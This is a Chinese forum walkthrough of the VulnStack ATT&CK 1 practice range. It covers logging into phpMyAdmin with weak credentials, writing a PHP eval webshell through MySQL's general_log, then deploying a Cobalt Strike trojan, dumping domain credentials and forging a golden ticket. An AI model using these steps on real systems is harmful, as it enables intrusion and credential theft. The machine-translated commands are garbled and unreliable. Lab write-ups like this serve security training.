H

VulnStack ATT\u0026CK 1 靶场

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%

VulnStack ATTCK 1 靶场​

环境​

20200416115230.png-water_print

信息收集​

端口探测​

20200416115357.png-water_print

只有80、3306开放

目录扫描​

访问端口80,发现主页是PHP探测器:
20200416115600.png-water_print

目录扫描:
20200416115450.png-water_print

发现phpmyadmin。

漏洞挖掘​

phpmyadmin尝试使用密码登录:
root:Root登录成功。
20200416115724.png-water_print

有很多方法可以在phpmyadmin背景
让我们首先看一下定期选择的淘汰赛:
20200416115754.png-water_print

这里的Secure_File_Priv是无效的,不允许写作和写作。
放弃此方法,并尝试写出MySQL General_log的Webshell。
首先查看全局变量的配置显示了全局变量,例如“%常规%”:
20200416115844.png-water_print

这里未启用一般日志,因此我将自己打开它并保存文件自定义:
1
2
设置global general_log='on'
设置Global General_log_file='C:/phpstudy/www/shell.php'
20200416120022.png-water_print

这里的绝对路径是通过先前的探针获得的。
然后编写webshell选择'?php @eval($ _ post ['bbll]);':
20200416120045.png-water_print

蚂蚁剑连接:
20200416120108.png-water_print

内网渗透​

首先检查系统数字的数量:
1
WMIC CPU获得地址宽度
20200416120239.png-water_print

使用CS生成特洛伊木马并上传:
20200416120319.png-water_print

实施:
20200416120340.png-water_print

直接在管理员权限的网上上网:
20200416120400.png-water_print

查看用户权限:
20200416120421.png-water_print

检查当前的登录域:
20200416120653.png-water_print

在域内查看用户:
20200416120848.png-water_print

查看域中的主机:
20200416120908.png-water_print

查看域:
20200416120941.png-water_print

转储密码:
20200416121030.png-water_print

横向移动​

20200416121203.png-water_print

DC在线之后,使用HashDump dump Krbtgt NTLM哈希:
20200416121319.png-water_print

做金笔记:
20200416121339.png-water_print
 
后退
顶部